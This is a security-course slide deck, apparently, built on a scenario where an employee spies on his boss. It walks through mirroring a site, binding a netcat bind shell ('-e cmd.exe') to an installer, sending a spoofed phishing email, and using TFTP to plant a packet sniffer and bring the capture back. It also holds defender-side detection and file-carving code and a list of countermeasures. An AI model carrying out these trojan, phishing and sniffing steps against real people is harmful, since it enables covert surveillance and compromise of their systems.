What’s the Boss viewing? (presentation transcript)

1 What’s the Boss viewing?

2
 The Boss established a new policy against surfing the web during work hours
 Phoenix decides to examine the sites that the Boss is looking at by spying on him

3
 The networked machines are connected via a switch
  ◦ Private 192.168.1.0 network
     Boss’ IP: 192.168.1.5
     Phoenix’s IP: 192.168.1.6

4
 Monitor traffic to and from the Boss’ machine
 How “loud” should this approach be?
  ◦ Loud/noisy means that it could trigger alarms on IDS/IPS systems
 There might be reasons to launch a noisy attack
  ◦ Provide a distraction from another attack
  ◦ Sometimes it’s the only way to monitor traffic
 Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done

5
 “Loud” methods
  ◦ Gratuitous ARP for individual hosts
     ARP poisoning
  ◦ MAC spoofing
  ◦ MAC flooding
  ◦ SPAN
     Port mirroring

6
 Gratuitous ARP
  ◦ Unsolicited ARP
     The protocol allows for it, without checking for a matching ARP request (stateless!)
     An ARP reply is sent out associating the target’s IP with the collector’s MAC address
 Spoof the MAC of the gateway
  ◦ Collector replies to ARP requests for the gateway’s MAC
  ◦ Switch will see the router’s MAC address on both switch ports and will send outbound traffic to both ports
 MAC flooding
  ◦ Overwhelm the switch’s MAC table
     Causes the switch to “fail over” into hub mode
     MACOF (http://monkey.org/~dugsong/dsniff/)
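Added example (not part of the deck): the defender’s side of this slide, detection logic run over a constructed log of ARP replies that flags the three tricks described here, an IP whose MAC changes (gratuitous-ARP poisoning), one MAC answering for the gateway’s IP as well as its own (gateway MAC spoofing), and a burst of never-seen MACs on one port (MAC flooding). The observation tuples, switch ports and MAC addresses are made up for the example.

```python
from collections import defaultdict

# Constructed sample of observed ARP replies on the 192.168.1.0 segment:
# (time in seconds, switch port, sender IP, sender MAC). Ports and MACs invented.
OBSERVATIONS = [
    (0.0, 1, "192.168.1.1", "00:11:22:00:00:01"),  # real gateway
    (0.5, 5, "192.168.1.5", "00:11:22:00:00:05"),  # boss' PC
    (1.0, 6, "192.168.1.6", "00:11:22:00:00:06"),  # collector's PC, so far normal
    (2.0, 6, "192.168.1.1", "00:11:22:00:00:06"),  # collector now answers for the gateway
] + [
    # 60 never-seen MACs within 0.6 s on port 6: the MACOF-style flood
    (3.0 + i / 100, 6, f"10.0.0.{i}", f"de:ad:be:ef:00:{i:02x}")
    for i in range(60)
]


def ip_mac_conflicts(observations):
    """Flag an IP whose MAC differs from the first one learned for it (gratuitous
    ARP poisoning or gateway spoofing). Returns (ip, old_mac, new_mac, port)."""
    learned, alerts = {}, []
    for _t, port, ip, mac in observations:
        if ip in learned and learned[ip] != mac:
            alerts.append((ip, learned[ip], mac, port))
        learned.setdefault(ip, mac)
    return alerts


def multi_ip_macs(observations):
    """MACs that claim more than one IP; a host MAC that also claims the
    gateway's IP is the spoofing case from the slide."""
    ips = defaultdict(set)
    for _t, _port, ip, mac in observations:
        ips[mac].add(ip)
    return {mac: sorted(v) for mac, v in ips.items() if len(v) > 1}


def flooded_ports(observations, window=1.0, threshold=50):
    """Ports on which more than `threshold` distinct new MACs appear within
    `window` seconds, the pattern that drives a switch into hub mode."""
    seen, recent, alerts = set(), defaultdict(list), set()
    for t, port, _ip, mac in observations:
        if mac in seen:
            continue  # only first appearances count
        seen.add(mac)
        times = recent[port]
        times.append(t)
        while t - times[0] > window:
            times.pop(0)  # slide the window forward
        if len(times) > threshold:
            alerts.add(port)
    return sorted(alerts)
```

Port security on the switch (slide 21) stops these at the edge; this logic is what a passive monitor such as an IDS sensor would run when that is not available.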

7
 Capture the traffic on the target host itself
  ◦ Plant WinPcap and a Trojan horse on the host
 The trick will be to install the software on the target host
  ◦ Boss will not blindly install software
     Have to convince him it’s something of value to him
 The plan consists of a chained series of exploits

8
 Copy a web site and host it on Phoenix’s server
 Bind Netcat to a legitimate executable file
 Send email to boss
  ◦ Download the free executable
  ◦ Netcat will also be downloaded and installed
 Connect to boss’ machine using Netcat
 Use TFTP and download a WinDump program onto boss’ machine
 Capture the boss’ network traffic
 Analyze captured traffic
 Rebuild a jpg image using a hex editor

9
 Phoenix locates a site and plans to get his boss to visit a copied version of the site
  ◦ Lays the groundwork via some social engineering
     Tells boss of a site “certificatepractice.com” which offers a free CCNA practice exam as a promotional offer
  ◦ Uses a utility to download and mirror the site
     Wget (www.gnu.org/software/wget)
     Copies the site recursively to the hard drive, following hyperlinks from the first page to an appropriate depth
     Will also copy the practice test executable
 Phoenix will bind his Trojan to this executable

10
 Trojan wrapper program is used
  ◦ YAB (Yet Another Binder)
     Areyoufearless.com (no longer there; however, it can be obtained via BitTorrent sites)
     Altavista.net
     Packetstormsecurity.org
  ◦ Add Bind File option
     Allows Phoenix to bind nc.exe
     Will execute nc (asynchronously is possible)
     Can add execution parameters when nc starts up: -p 50 -e cmd.exe -L
  ◦ Registry startup option available (default is no)
  ◦ Melt stub option
     Will remove netcat after execution
  ◦ An icon can be added to make the install appear legitimate

11
 Overwrite the original ccna.exe file with the bound Trojan file in the phony site
 Register a very similar domain name
  ◦ “certification-practice.com”
 Send an email to the victim
  ◦ Phoenix uses an anonymous e-mailer and spoofs the email header so that the “From:” appears to be the real site
     www.mail.com
     Doesn’t require a “real” email address to register
     Victim would have to read the email message headers in order to see the real source domain

12
 Check for spelling and grammatical errors
 Offer something free or on a trial basis
 Appeal to greed
  ◦ Why the victim is getting something for nothing
  ◦ Lowers suspicion
 Appeal to the victim’s sense of self
  ◦ Self-help tools, adding to success, etc.
 Brevity
 Text of the email contains the link to the site
  ◦ Appears as the URL of the real site, but the hyperlink really points to the phony site
 Present the email to the victim
  ◦ Possibly prepare the victim for the email, adding to the enticement

13
 Angry IP Scanner
  ◦ www.angryziber.com/ipscan/
 Scan IPs on the network for the IP with port 50 open and listening

14
 nc to the victim’s machine on port 50
 Verify the connection using ipconfig
  ◦ Will show the victim machine’s IP in the nc window

15
 Use command line utilities
  ◦ nc does not allow for usage of a GUI (Windows) interface
 Sysinternals has a TFTP server available
  ◦ Free
  ◦ No configuration required
  ◦ Windows already has a TFTP client!
 Windump is downloaded
  ◦ www.winpcap.org/windump
  ◦ Placed into the default TFTP server directory (TFTP-Root)
 Phoenix sets up a TFTP server on his machine
 Using Netcat, Phoenix types: tftp -i 192.168.1.6 get windump.exe windump.exe
  ◦ Syntax: tftp [-i] host [put | get] source destination
  ◦ -i switch: use binary transfer

16
 Options
  ◦ -c count (number of packets)
  ◦ -s snaplength (length of packets captured)
  ◦ -w filename (file for captured packets)
  ◦ windump -c 500 -s 1500 -w capture.log
 If the victim does not have WinPcap installed, Phoenix must transfer and manually install WinPcap on the victim machine
  ◦ Windump requires WinPcap

17
 Phoenix downloads WinPcap
 Unzips it
 TFTP (to the victim’s WinPcap directory):
  ◦ Daemon_mgm.exe
  ◦ NetMonInstaller.exe
  ◦ Npf_mgm.exe
  ◦ Rpcapd.exe
  ◦ Uninstall.exe
 Execute:
  ◦ Npf_mgm.exe -r
  ◦ Daemon_mgm.exe -r
  ◦ NetMonInstaller.exe i

18
 Using Netcat: tftp -i put 192.168.1.6 capture.log
 Use a packet analyzer to view the traffic
  ◦ Wireshark
 A review shows the sites visited by the victim
  ◦ Includes a GET (HTTP) for a file called “gambling.jpg”
 Follow TCP stream
  ◦ Capture the output as raw data
  ◦ Use a hex editor (WinHex), if required, to edit the raw data
     Remove everything before the actual binary file (HTTP headers, etc.)
     Leaves just the actual binary of the image
     A jpg starts with ÿØÿà
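Added example (not part of the deck): the hex-editor step above done programmatically, the way an incident responder reconstructs a fetched file from a saved TCP stream. The HTTP response bytes are constructed for the example; “ÿØÿà” is how a Latin-1 hex-editor view shows the JPEG/JFIF start bytes FF D8 FF E0, and a JPEG ends with FF D9.

```python
# JPEG markers: SOI (FF D8) followed by an APPn marker (FF Ex); the JFIF form
# FF D8 FF E0 displays as "ÿØÿà" in a Latin-1 hex editor. EOI is FF D9.
JPEG_SOI = b"\xff\xd8\xff"
JFIF_HEAD = b"\xff\xd8\xff\xe0"
JPEG_EOI = b"\xff\xd9"

# Constructed stand-in for what "Follow TCP stream -> Save as raw" produces:
# an HTTP response whose body is a tiny JFIF-shaped blob (not a viewable
# picture, just enough structure to carve).
FAKE_JPEG = (JFIF_HEAD + b"\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
             + b"\x12\x34\x56" + JPEG_EOI)
RAW_STREAM = (
    b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n"
    b"Content-Length: %d\r\n\r\n" % len(FAKE_JPEG)
) + FAKE_JPEG


def split_http_response(raw):
    """Split a raw server response at the blank line that ends the headers."""
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise ValueError("no end-of-headers marker in stream")
    headers = raw[:end].decode("latin-1").split("\r\n")
    return headers, raw[end + 4:]


def content_length(headers):
    """Content-Length value if the server sent one, else None."""
    for line in headers[1:]:  # headers[0] is the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-length":
            return int(value.strip())
    return None


def carve_jpeg(raw):
    """Return only the image bytes: drop the HTTP headers, trust Content-Length
    over any trailing stream data, and require both JPEG markers. Assumes an
    identity (non-chunked, uncompressed) transfer, as in the slide's capture."""
    headers, body = split_http_response(raw)
    length = content_length(headers)
    if length is not None:
        body = body[:length]  # bytes past this belong to the next response
    if not body.startswith(JPEG_SOI):
        raise ValueError("body does not begin with a JPEG SOI marker")
    end = body.rfind(JPEG_EOI)
    if end < 0:
        raise ValueError("no EOI marker: the capture is truncated")
    return body[:end + 2]
```

Writing the returned bytes to a file with a .jpg extension gives the image an analyst would then open; a missing EOI is the usual sign that the stream was cut off mid-transfer.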

19

20
 Anonymous note left on the victim’s desk highlighting the activity
 Internet usage policy relaxed the next day

21
 Phishing
  ◦ Training!
  ◦ Spam filters / phishing filters
 Trojan horse
  ◦ Anti-virus software
     Latest signatures
  ◦ However, organizations will alter the Trojan (for a price) so that it does not match a signature
     EliteC0ders (no longer offers this “service”)
  ◦ Software policy
 Sniffing
  ◦ Port security on switches
     Protects against ARP poisoning, MAC spoofing and MAC flooding
  ◦ IPS
  ◦ PromiScan
  ◦ Host based IDS
     Cisco Secure Agent
     Warns if a new application is launching

